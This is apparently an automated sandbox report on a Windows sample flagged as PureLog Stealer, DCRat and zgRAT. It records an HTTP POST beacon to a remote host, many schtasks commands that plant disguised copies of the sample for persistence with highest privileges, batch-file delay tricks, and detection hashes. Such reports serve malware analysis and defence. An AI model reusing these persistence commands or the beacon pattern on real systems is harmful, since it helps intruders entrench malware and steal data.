Dec 25, 2024 19:32:05.769901991 CET	301	OUT	POST /VmMulti.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 328579cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 25, 2024 19:32:06.129683018 CET	344	OUT	Data Raw: 05 01 04 00 06 08 01 07 05 06 02 01 02 01 01 04 00 01 05 09 02 05 03 0d 01 0f 0e 0d 05 04 00 09 0f 51 04 0f 00 53 04 05 0e 56 02 04 04 06 04 00 03 0a 0e 5a 0e 0e 05 0b 06 50 05 00 04 56 05 0e 05 06 0c 0a 00 02 07 07 0d 06 0d 03 0c 04 0c 52 05 57 Data Ascii: QSVZPVRWRR\L~AhfwL[vu]QhyLt\|U^k]\|olg{NPJ\|SQSvg\u~V@{C~N}be
Dec 25, 2024 19:32:07.121733904 CET	25	IN	HTTP/1.1 100 Continue
Dec 25, 2024 19:32:07.354645014 CET	977	IN	HTTP/1.1 502 Bad Gateway Date: Wed, 25 Dec 2024 18:32:07 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: keep-alive Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NzeRgLlIpNsix%2FEsmIoM5u4NwhvmvD5knt37959x4qpNhJMDNXz2vrbATr5SB2ZCERsJmDWH16fFdz5Ddlv6GwrsrKFYbqZgKeS3CsBvvYOANo6lI2nZI8muusp0n8lqCC6celOJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8f7ae9738c3a42ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=84700&min_rtt=53328&rtt_var=42406&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=27377&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32 Data Ascii: error code: 502

Target ID:	0
Start time:	13:31:53
Start date:	25/12/2024
Path:	C:\Users\user\Desktop\F3ePjP272h.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\F3ePjP272h.exe"
Imagebase:	0x700000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2004955727.0000000000702000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2051185563.0000000012DEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Cookies\sihost.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Cookies\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxi" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:31:56
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Windows\Speech\Engines\SR\Idle.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "F3ePjP272h" /sc ONLOGON /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "F3ePjP272hF" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\F3ePjP272h.exe'" /rl HIGHEST /f
Imagebase:	0x7ff706530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diPKyqwECs.bat"
Imagebase:	0x7ff796820000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6d2b00000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:31:57
Start date:	25/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7bbab0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:31:58
Start date:	25/12/2024
Path:	C:\Users\user\Desktop\F3ePjP272h.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\F3ePjP272h.exe
Imagebase:	0x4b0000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:31:58
Start date:	25/12/2024
Path:	C:\Users\user\Desktop\F3ePjP272h.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\F3ePjP272h.exe
Imagebase:	0x290000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:31:58
Start date:	25/12/2024
Path:	C:\Windows\Speech\Engines\SR\Idle.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Speech\Engines\SR\Idle.exe
Imagebase:	0x690000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\Engines\SR\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\Engines\SR\Idle.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:31:58
Start date:	25/12/2024
Path:	C:\Windows\Speech\Engines\SR\Idle.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Speech\Engines\SR\Idle.exe
Imagebase:	0xa50000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:31:58
Start date:	25/12/2024
Path:	C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
Imagebase:	0xf70000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:31:59
Start date:	25/12/2024
Path:	C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\reference assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe"
Imagebase:	0xe90000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:31:59
Start date:	25/12/2024
Path:	C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Cookies\sihost.exe
Imagebase:	0x730000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:31:59
Start date:	25/12/2024
Path:	C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Cookies\sihost.exe
Imagebase:	0x670000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:32:06
Start date:	25/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\euqVpFfbpH.bat"
Imagebase:	0x7ff796820000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:32:07
Start date:	25/12/2024
Path:	C:\Windows\Speech\Engines\SR\Idle.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Speech\Engines\SR\Idle.exe"
Imagebase:	0xd70000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:32:07
Start date:	25/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:32:07
Start date:	25/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6d2b00000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:32:07
Start date:	25/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7819d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:32:12
Start date:	25/12/2024
Path:	C:\Windows\Speech\Engines\SR\Idle.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Speech\Engines\SR\Idle.exe"
Imagebase:	0x3c0000
File size:	1'917'440 bytes
MD5 hash:	49715A369F3516495CD8016709B367A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F40D48 Relevance: 1.5, Strings: 1, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5X_H, xrefs: 00007FF848F40DF3

Memory Dump Source

Source File: 00000000.00000002.2056253443.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_F3ePjP272h.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 74b53a1ff7a3c85889e398ef30938cdc4d4057cf5010f4cc6a71d7faa801c9d4
Instruction ID: f81a3241984c09f9e7f5deb5fbd045aef9a541bfb86c33c59b8d29a4b940bd57
Opcode Fuzzy Hash: 74b53a1ff7a3c85889e398ef30938cdc4d4057cf5010f4cc6a71d7faa801c9d4
Instruction Fuzzy Hash: 8491BF7191DA899FE789EB2888293A97FE0FBA6750F4400BBC049D72D3CF791815C741

Function 00007FF84933A40D Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064028325.00007FF849330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849330000_F3ePjP272h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56887ac8bd39c17fd63627458bf0712bdcacc781200d0e274d5ef41223d65ee7
Instruction ID: f1f40e6997a58ed8e501469301ab9f139ab0c245441e56dbf2eeeba319c43e1f
Opcode Fuzzy Hash: 56887ac8bd39c17fd63627458bf0712bdcacc781200d0e274d5ef41223d65ee7
Instruction Fuzzy Hash: 8E02A631E5C95A8FEBA8FB6884566B973E1FF99390F54117ED40DD32C2CE286C828741

Function 00007FF8493450E2 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064028325.00007FF849330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849330000_F3ePjP272h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf5f5542b75c9ce50ca0073a94b97567a41d22f9dfd789fe4da5a9f70dc9f81
Instruction ID: 7c6b04f9ebe0adbc6c434ad6b6e060196c39364388243e7060969d934b5fbb26
Opcode Fuzzy Hash: 2cf5f5542b75c9ce50ca0073a94b97567a41d22f9dfd789fe4da5a9f70dc9f81
Instruction Fuzzy Hash: 01E1A23090CA8E8FEBA8EF28C8557E977D1FF55350F14426EE84DC7291CE78A9458B81

Function 00007FF848F40E43 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056253443.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_F3ePjP272h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf575e7c258a4a4c7cc3dfe526391d397467c0583359bd3305585a8193ad44b
Instruction ID: 0d412d5ec3ea875b7bbf01c7b354cf8f0f1ae152b691f7ecfa08443696808f01
Opcode Fuzzy Hash: 2bf575e7c258a4a4c7cc3dfe526391d397467c0583359bd3305585a8193ad44b
Instruction Fuzzy Hash: 9451B271918A499EE788EB28C8697B97FE0FB9A7A4F5001BFC009D37D2CB791425C700

Function 00007FF84933C4C3 Relevance: 1.8, APIs: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FF84933C681

Memory Dump Source

Source File: 00000000.00000002.2064028325.00007FF849330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849330000_F3ePjP272h.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 251093c9b8f475414fe38d4fc893958fad602bc2a26094dffbb2a1af8b9a0290
Instruction ID: 458260ec87ec15d4b8c400bdc1dce8dbf31646461bb14732557e4d5c573e95ce
Opcode Fuzzy Hash: 251093c9b8f475414fe38d4fc893958fad602bc2a26094dffbb2a1af8b9a0290
Instruction Fuzzy Hash: BC81903051CA8C4FEB69EE18D8597F937E1FB69311F04526FE84EC7292CB74A8458B81

Function 00007FF84933C4B5 Relevance: 1.7, APIs: 1, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FF84933C681

Memory Dump Source

Source File: 00000000.00000002.2064028325.00007FF849330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849330000_F3ePjP272h.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 69ff8278109f5c44533b4e9508c73add9cab7a6a298c6d770730b99902a15a43
Instruction ID: 9c4c642f07e9807fa4da16181a576eddb7ba92f16d6bb358f1d398526ac35f96
Opcode Fuzzy Hash: 69ff8278109f5c44533b4e9508c73add9cab7a6a298c6d770730b99902a15a43
Instruction Fuzzy Hash: 55718030518A8C4FEB68EE18D8597F937E1FB59315F14522EE84EC7292CB74A8458B81

Function 00007FF848F408D0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056253443.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_F3ePjP272h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e80edc1b2ec4459ffec18345f8df7564a5419c5797928be1b9d51aaaf41c0d
Instruction ID: 26fae79a492c3ca17ef5dbbb9e4b0cf79977ca272e2536bf6c971c0270924148
Opcode Fuzzy Hash: a1e80edc1b2ec4459ffec18345f8df7564a5419c5797928be1b9d51aaaf41c0d
